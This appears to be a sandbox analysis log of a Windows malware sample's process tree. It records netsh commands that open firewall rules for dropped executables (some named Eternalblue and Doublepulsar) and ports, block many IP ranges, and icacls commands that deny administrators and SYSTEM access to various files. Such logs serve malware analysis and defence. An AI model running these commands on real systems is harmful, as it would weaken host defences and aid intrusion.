  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:3380
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:4216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:4736
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      PID:2084
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:4348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      PID:5072
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:2216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      PID:3236
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      PID:4440
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:4852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      PID:4652
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:3556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      PID:3384
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3976
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      PID:4460
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:4876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      PID:1652
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        5⤵
        Modifies Windows Firewall
        
        PID:3536
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      PID:2892
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2264
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        5⤵
        Modifies Windows Firewall
        
        PID:344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      PID:1104
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1304
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        5⤵
        Modifies Windows Firewall
        
        PID:2344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:636
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4192
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
        5⤵
        Modifies Windows Firewall
        
        PID:624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:3820
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1460
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
        5⤵
        Modifies Windows Firewall
        
        PID:4692
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:3380
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
        5⤵
        Modifies Windows Firewall
        
        PID:3572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:4340
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
        5⤵
        Modifies Windows Firewall
        
        PID:4320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:1156
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
        5⤵
        Modifies Windows Firewall
        
        PID:5032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:4380
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
        5⤵
        Modifies Windows Firewall
        
        PID:2592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:4888
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4764
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
        5⤵
        Modifies Windows Firewall
        
        PID:2416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:3064
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
        5⤵
        Modifies Windows Firewall
        
        PID:2056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
      4⤵
      PID:3888
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
        5⤵
        Modifies Windows Firewall
        
        PID:2008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
      4⤵
      PID:4376
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
        5⤵
        Modifies Windows Firewall
        
        PID:2376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:736
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
        5⤵
        Modifies Windows Firewall
        
        PID:4732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:5060
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
        5⤵
        Modifies Windows Firewall
        
        PID:4200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:3648
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
        5⤵
        Modifies Windows Firewall
        
        PID:2548
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:1360
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
        5⤵
        Modifies Windows Firewall
        
        PID:3132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
      4⤵
      PID:4184
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
        5⤵
        Modifies Windows Firewall
        
        PID:4264
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
      4⤵
      PID:1316
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1756
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
        5⤵
        Modifies Windows Firewall
        
        PID:2348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
      4⤵
      PID:3696
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
        5⤵
        Modifies Windows Firewall
        
        PID:4560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
      4⤵
      PID:3156
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4216
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
        5⤵
        Modifies Windows Firewall
        
        PID:4976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
      4⤵
      PID:2820
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
        5⤵
        Modifies Windows Firewall
        
        PID:2544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
      4⤵
      PID:228
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
        5⤵
        Modifies Windows Firewall
        
        PID:2532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
      4⤵
      PID:3936
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
        5⤵
        Modifies Windows Firewall
        
        PID:1964
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
      4⤵
      PID:3456
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3716
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
        5⤵
        Modifies Windows Firewall
        
        PID:876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
      4⤵
      PID:4444
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3236
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
        5⤵
        Modifies Windows Firewall
        
        PID:2236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
        5⤵
        Modifies Windows Firewall
        
        PID:1032
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
      4⤵
      PID:2008
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
        5⤵
        Modifies Windows Firewall
        
        PID:2296
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
      4⤵
      PID:2340
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
        5⤵
        Modifies Windows Firewall
        
        PID:4988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
      4⤵
      PID:3440
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
        5⤵
        Modifies Windows Firewall
        
        PID:4400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
      4⤵
      PID:3620
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
        5⤵
        Modifies Windows Firewall
        
        PID:4084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
      4⤵
      PID:3152
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
        5⤵
        Modifies Windows Firewall
        
        PID:3472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
      4⤵
      PID:3944
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
        5⤵
        Modifies Windows Firewall
        
        PID:3848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
      4⤵
      PID:1152
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
        5⤵
        Modifies Windows Firewall
        
        PID:2892
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
      4⤵
      PID:968
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
        5⤵
        Modifies Windows Firewall
        
        PID:1448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
      4⤵
      PID:4812
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
        5⤵
        Modifies Windows Firewall
        
        PID:4196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
      4⤵
      PID:4864
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
        5⤵
        Modifies Windows Firewall
        
        PID:4244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
      4⤵
      PID:4320
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
        5⤵
        Modifies Windows Firewall
        
        PID:4604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
      4⤵
      PID:4688
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
        5⤵
        Modifies Windows Firewall
        
        PID:4192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
      4⤵
      PID:2320
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
        5⤵
        Modifies Windows Firewall
        
        PID:4328
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
      4⤵
      PID:4736
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
        5⤵
        Modifies Windows Firewall
        
        PID:4380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:380
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls ""C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:2112
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls ""C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:4888
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls ""C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1436
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3100
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls ""C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:2056
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls ""C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:536
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:5020
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls ""C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:800
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
        5⤵
        
        PID:3480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
      4⤵
      PID:3536
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
        5⤵
        
        PID:4396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
      4⤵
      PID:4988
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:116
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:3508
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3156
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:4864
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:3600
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:4976
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        
        PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny Администраторы:(OI)(CI)(F)
      4⤵
      PID:1984
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny Администраторы:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      PID:4236
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
